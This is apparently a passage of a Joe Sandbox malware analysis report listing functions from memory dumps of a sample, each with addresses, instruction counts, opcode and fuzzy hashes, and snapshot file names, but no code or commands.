                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84b840b0cf448e69b1bb6437781b6f10d8b82782e2fdfefd59b71f15cbfa8534
                                                        • Instruction ID: 3beb66913d4058cbe7083c76a9215fae7975315dec709df8c8116ffc8af0e5af
                                                        • Opcode Fuzzy Hash: 84b840b0cf448e69b1bb6437781b6f10d8b82782e2fdfefd59b71f15cbfa8534
                                                        • Instruction Fuzzy Hash: 5301D4F582C249DEC3068B98C690BFE7B3AAB5B324F34875AE86257146C3615E50C369
                                                        Function 071201DC Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b7acdf241fcd88f266457eaaf38860f118d08c891b35b252d091b94572411c9
                                                        • Instruction ID: 301edf455ca52e5220bf4e57a7328b03a55972a6122a90c8d835121ace02775d
                                                        • Opcode Fuzzy Hash: 2b7acdf241fcd88f266457eaaf38860f118d08c891b35b252d091b94572411c9
                                                        • Instruction Fuzzy Hash: 15F02BEB088230ADD74955A587446F69E5FB75F330B324227F00780646E354466E3170
                                                        Function 07070B0A Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2bb8c495c0653f9f3a73d79018e190d58d5cf98a26fda79cb962a9fcfe58ce8f
                                                        • Instruction ID: d5dc6e4a73d4b580f39b3de2505d331090e4fb929c087f69563e0437dcc87171
                                                        • Opcode Fuzzy Hash: 2bb8c495c0653f9f3a73d79018e190d58d5cf98a26fda79cb962a9fcfe58ce8f
                                                        • Instruction Fuzzy Hash: 4D0126F182C205DEC3028B54C6507FD3B3AA767234F31878AE86356102C3611F40C329
                                                        Function 07070B7A Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81dd1fe237d433653a4418042f770777853b8ac555c7285da0883cb2de5af204
                                                        • Instruction ID: f00ab738ef5476766bfb370b8aebefe3caa74909b848edc81f11bc6163c26e6e
                                                        • Opcode Fuzzy Hash: 81dd1fe237d433653a4418042f770777853b8ac555c7285da0883cb2de5af204
                                                        • Instruction Fuzzy Hash: A7F028F4C2C109EDD301CB548994BFE3B3DDA9B330F318B5AE8729A011C2114F52C1AA
                                                        Function 07120211 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ccdb10d939f305fb0aa72e936310a6b6f13cd04a1cbfa63f7b6a60ef3e2123b
                                                        • Instruction ID: 5251e4e15a69c4c764e92613d49ecaca97a86f8ec52ef190bfc76a6038fa7fc8
                                                        • Opcode Fuzzy Hash: 3ccdb10d939f305fb0aa72e936310a6b6f13cd04a1cbfa63f7b6a60ef3e2123b
                                                        • Instruction Fuzzy Hash: DEF021E714C3A09ED307966455D45DABFA9FD8B27133500BBE446C7543D384471A93B2
                                                        Function 07120235 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf76fd4314be56b3bfa80124fa69be93d4324c390faf20d06ba25e3eff178d81
                                                        • Instruction ID: 4d1229903b6fb9dba05f88657245362343ebc65f51e6f5cfea8a22a272bed426
                                                        • Opcode Fuzzy Hash: bf76fd4314be56b3bfa80124fa69be93d4324c390faf20d06ba25e3eff178d81
                                                        • Instruction Fuzzy Hash: 28F027BB5443209FD308E56992842EBB7DAAA4B331731003BE00283565D3558659A1A1
                                                        Function 0712024E Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 735dd595900ac858b443c2b4d5ea178626d0e137f545ef7eeecbace23dcab565
                                                        • Instruction ID: 54375ae55455f8bc2f70387fd54d2b0722278c2e4ee1134b59f8d40293619cab
                                                        • Opcode Fuzzy Hash: 735dd595900ac858b443c2b4d5ea178626d0e137f545ef7eeecbace23dcab565
                                                        • Instruction Fuzzy Hash: F7E02B775443A09EDB05D6AD52505EFEBB8FD4723033545AFE00586101D780090D9370
                                                        Function 07120268 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5efb2ef8949a44d572bc0426ca62f93b9e0bf76cfa12ed43ba110a3de1b23ded
                                                        • Instruction ID: 636762bd9327c02ba08dfcb73ac64e0574e21d813bc5cd24ac7e6232e821f8b2
                                                        • Opcode Fuzzy Hash: 5efb2ef8949a44d572bc0426ca62f93b9e0bf76cfa12ed43ba110a3de1b23ded
                                                        • Instruction Fuzzy Hash: A8E026B7480721ADD705D59A2350AEBEBEDF88B2313B14537F00AD7A01E3950B5CA1F1
                                                        Function 07120271 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3033ea3cd3f53035992275cb9a6abc46b1e07093b700a4b7c746588410b1be9
                                                        • Instruction ID: 491f773a4a83f0d8a24d2014a66ecea67340fdb65340b49ab8ebbc7832d10f79
                                                        • Opcode Fuzzy Hash: b3033ea3cd3f53035992275cb9a6abc46b1e07093b700a4b7c746588410b1be9
                                                        • Instruction Fuzzy Hash: B3E026A7140710ADD609DB9A52404DBE7ADF9472313344933E006C2602E7960A1C52B4
                                                        Function 0712028D Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1743121059.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7120000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a0a3e18d583ded371d9be45787a277f3fb4130535d146f8bfc8aa6231c7298c
                                                        • Instruction ID: 17ee1ca5474ab3a996523caa71ebe6b600eef728648ab781bfdf78cd31f18960
                                                        • Opcode Fuzzy Hash: 0a0a3e18d583ded371d9be45787a277f3fb4130535d146f8bfc8aa6231c7298c
                                                        • Instruction Fuzzy Hash: 42C0129B5C42603CE141D0DA27544EADBAEF5C73713318433F006D1506A2C90A4C21B1